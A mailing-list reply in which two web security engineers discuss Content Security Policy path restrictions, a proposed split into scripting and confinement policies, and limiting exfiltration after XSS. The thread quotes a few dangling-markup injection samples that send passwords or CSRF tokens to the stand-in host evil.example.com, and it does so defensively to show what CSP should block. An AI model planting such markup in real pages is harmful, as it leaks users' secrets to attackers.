Re: A modest content security proposal.

On Tue, 23 Jul 2019 at 08:51, Mike West <mkwst@google.com> wrote:

> On Thu, Jul 18, 2019 at 3:03 PM Craig Francis <craig.francis@gmail.com>
> wrote:
>
>> Dropbox does, e.g.
>>
>>     script-src ... https://www.dropbox.com/*static/compiled/js*/ ...
>>
>
> That's interesting! I see a `script-src` directive of:
>
> """
> 'unsafe-eval' https://www.dropbox.com/static/compiled/js/
> https://www.dropbox.com/static/api/ https://www.dropbox.com/page_success/
> https://cfl.dropboxstatic.com/static/compiled/js/
> https://www.dropboxstatic.com/static/compiled/js/
> https://cfl.dropboxstatic.com/static/js/
> https://www.dropboxstatic.com/static/js/
> https://cfl.dropboxstatic.com/static/src/dws-ensemble-appshell/
> https://www.dropboxstatic.com/static/src/dws-ensemble-appshell/
> https://cfl.dropboxstatic.com/static/previews/
> https://www.dropboxstatic.com/static/previews/
> https://cfl.dropboxstatic.com/static/api/
> https://www.dropboxstatic.com/static/api/
> https://cfl.dropboxstatic.com/static/cms/
> https://www.dropboxstatic.com/static/cms/ 'nonce-bd/4MtKomUcNJnd6l1bf'
> """
>


Yep, I did need to abbreviate their `script-src` a bit; I just wanted to
show paths being used :-)



> I wonder whether any redirects exist under any of those directories?
>


A more typical (smaller) website probably doesn't need that many paths, and
if those paths only contain static files, then you're unlikely to find a
redirect in there.

As in, it's common to have "/js/", "/css/", and "/img/" folders when using
a minifier/compressor, an ES6-to-ES5 transpiler, a WebM converter, etc.
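For a hypothetical site with that kind of layout (the hostname and paths
below are just placeholders, and the header is wrapped here for
readability), the resource confinement part of the policy could be as
small as:

    Content-Security-Policy:
        default-src 'none';
        script-src https://www.example.com/js/;
        style-src https://www.example.com/css/;
        img-src https://www.example.com/img/

And because the build output is the only thing written into those folders,
there's nowhere for a redirect to appear under them.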

It's when third-party content gets involved that it gets complicated
(hence why I keep going on about making iframes easier to use, e.g. setting
the height automatically <https://github.com/craigfrancis/iframe-height>,
as it means some of the third-party JavaScript can be locked in there).

I'm hopeful that, over time, website developers will get used to these
security features and make them easier to implement... they will often
start with the basics, then increase the restrictions over time.


I don't have fundamental objections to including some sort of path
> restrictions in whatever we do next. I don't think they're terribly useful
> as-defined in CSP3: they sincerely complicate writing a parser, and they're
> more or less neutered so as to not leak data about redirects.
>


Assuming those paths don't include redirects, I think the path restrictions
are still useful.


I'll describe my setup below, but in summary, while the initial setup took
>> a few days, I was able to start with hostname only, and then I switched to
>> path based restrictions one at a time.
>>
>> And once paths were setup, maintenance has been really easy (especially
>> if the tooling exists to easily add paths to the CSP).
>>
>
> Thanks! This is interesting information! +Devdatta Akhawe
> <dev@dropbox.com> might have thoughts about the work/reward ratio that
> went into creating Dropbox's list.
>


Yep, I'd be interested in their view as well (Dropbox does have quite a
long list; I'm assuming it's there to cover the whole site, rather than
being page-specific?).


My "trusted" server has a folder for user uploaded content, and I always
>> see that as relatively dangerous.
>>
>
> That seems like a thing that would be worth looking into changing. `
> googleusercontent.com` exists for a reason. :)
>


I'm also looking at setting up a domain just for my static content.

But the user-uploaded content does require authorisation to view (e.g.
medical documents), and getting that to work cross-domain is more
complicated (not impossible); I also need it to work on my development and
testing/demo servers (I'll skip that bit today).
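If/when I do split it out, a rough sketch of the response headers
(hypothetical setup, not what I'm running today) might be:

    # Static assets on a separate, cookie-less domain:
    Content-Security-Policy: default-src 'none'

    # Authorised, user-uploaded files (never rendered as HTML):
    Content-Security-Policy: sandbox; default-src 'none'
    Content-Disposition: attachment; filename="document.pdf"
    X-Content-Type-Options: nosniff

The `sandbox` directive and the forced download are belt-and-suspenders,
so even if a malicious upload slips through, it shouldn't get to run
script against the main origin.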


The intention is to have layers... 1. my server side code shouldn't have
>>> any XSS vulnerabilities; if it does, 2. CSP should stop the loading of
>>> scripts; if that fails (e.g. a legitimate script was replaced by a hacker),
>>> 3. that script should be limited in what it can do to that page.
>>>
>>
>> Nothing in this proposal (or CSP) limits the capability of a script to
>> modify a given page. They both seem to limit the ability of a script to
>> pull in resources, and potentially to exfiltrate data.
>>
>>
>>
>> True, modifying the current page isn't great, and I don't think there is
>> a way to stop that.
>>
>> It does limit the script in getting information, and then applying
>> modifications based on that, or pulling in even more resources (e.g. a
>> crypto miner).
>>
>> But if that page contains sensitive data (e.g. information about someones
>> disabilities), I want to do everything I can to stop that data getting out.
>>
>> Admittedly I'm sure there are still ways of exfiltrating, but my current
>> CSP should make it difficult if the attacker has *only* managed to
>> get JavaScript execution.
>>
>> That's where I would like the Resource Confinement to focus on... let's
>> say the nonce based XSS Mitigation has failed, what now? do we just let the
>> malicious JS do whatever it wants?
>>
>
> Yes.
>
> Unless (until!) we invent a mechanism for sandboxing scripts on a page
> (and WASM's import structure might be a reasonable model), nothing about
> the determination of _which_ scripts to execute will have an impact on
> _what_ those scripts can do once they execute.
>


Some kind of sandboxing on the page would be pretty cool.

But, if evil JavaScript is running (i.e. Scripting-Policy has failed
somehow), and let's say it has access to the full DOM (no
sandbox), Resource Confinement to specific paths can still be useful.

For example, if the JavaScript can get the value from a textarea, how does
it get it out?

On my site it can't send the data via a form tag (form-action); the only
image/CSS/JS files come from paths that contain static content (and the
server's access logs aren't easily read); fetch/XMLHttpRequest is blocked
(or limited to a certain API); and, while not implemented completely yet,
`navigate-to` will hopefully stop a navigation request passing that data
via a query string... I'm sure there are still other ways (maybe something
that causes a DNS lookup to an attacker-controlled domain?), but these path
restrictions have made it a lot harder; will the attacker bother to keep
trying?
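As a rough sketch (placeholder hostnames/paths, wrapped for readability,
and noting that `navigate-to` is still only a CSP3 proposal), the relevant
directives look something like:

    Content-Security-Policy:
        default-src 'none';
        script-src https://www.example.com/js/;
        style-src https://www.example.com/css/;
        img-src https://www.example.com/img/;
        form-action 'self';
        connect-src https://api.example.com/v1/;
        navigate-to 'self'

With form submissions, fetch/XHR, and the static resource paths all locked
down, the easy exfiltration routes are gone, and the attacker has to work
much harder for a much smaller payoff.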


And finally, some DOM messing around can cause issues:
>>>
>>>    <form action="https://evil.example.com">
>>>    <form action="./">
>>>       <input name="password" />
>>>    </form>
>>>
>>>    <img src='https://evil.example.com<form action="./"><input
>>> name="csrf" value="abc123" />...' />...
>>>
>>
>> These are indeed problems (along with the rest of
>> http://lcamtuf.coredump.cx/postxss/).
>>
>>
>>
>> I'm fairly sure that's where I saw those problems first... but due to the
>> CSP restrictions I've been able to add, with paths, I think I've got those
>> issues covered as well (via form-action, img-src, and other things).
>>
>
> I suspect these will be better handled by changing the platform, a la
> https://github.com/whatwg/fetch/issues/546 (which Chromium shipped, Apple
> objected to, and Mozilla seemed on board with, at least conceptually).
>


I agree it will be better handled that way, and I'm looking forward to it
happening, especially as blocking "\n" looks like an easy win, and I hope
"<" can be blocked as well (ref an SVG in a `data:` URI).

That leaves an incredibly unlikely case, where you have an injection point
both before and after plain-text data, but this is becoming quite contrived...

     The student XXX<img src="https://evil.example.com has YYY and is from
ZZZ">.

Possibly done by a CSRF changing the student's name and location... meh,
that's probably a bit too weird.


Maybe introduce Scripting-Policy first; then deprecate the old/un-necessary
>>> parts of CSP, but still keep CSP around with a focus on Resource
>>> Confinement?
>>>
>>
>> `Scripting-Policy` is the bit I'm most interested in, to be sure. I'm
>> interested in `Confinement-Policy` mostly as a way to support the
>> belt-and-suspenders approach noted in
>> https://csp.withgoogle.com/docs/faq.html#strict-dynamic-with-whitelists.
>>
>> I think it will be difficult to use `Scripting-Policy` with CSP's
>> `script-src` directive (or, at least, I'd consider it a non-goal to make
>> that interaction simple and easy). If we're going to run in this direction,
>> I'd prefer to just do one thing. Obviously we wouldn't dump CSP tomorrow,
>> but I don't think keeping both around forever is a reasonable plan.
>>
>>
>>
>> That's a good example.
>>
>> The `Scripting-Policy` header should be the developers first and
>> main focus, where I think it would help mitigate *most* of the XSS problems.
>>
>> But I'd still like to apply strict Resource Confinement.
>>
>> Maybe the recommendation to developers should be that the CSP header is
>> added by websites that want/need to apply those extra restrictions?
>>
>> I think the current CSP syntax works well for that, it already gives you
>> host based restrictions, it already allows you to add path restrictions,
>> and it does it by resource type.
>>
>> Doing the nonce part separately, and deprecating things which aren't
>> needed any more, will leave a fairly good Confinement-Policy.
>>
>
> That might well be a reasonable approach. I think CSP's history as a
> dual-use mechanism has made some things more complicated than pure resource
> confinement (see `style-src`'s `'unsafe-eval'` and `'unsafe-inline'` for
> instance), but perhaps we can excise those pieces over time?
>


I'd be very happy with that direction... get `Scripting-Policy` working
first, then deprecate/remove/excise the messy bits of CSP so it can be used
by sites that want to do Resource Confinement.



As to the websites I build, this is perhaps going a bit off topic, but
>> might be useful...
>>
>
> Thanks for the description of your workflow! I found it very interesting,
> but I don't have any terribly insightful feedback for you beyond that. :)
>
> -mike
>

Received on Tuesday, 23 July 2019 19:44:20 UTC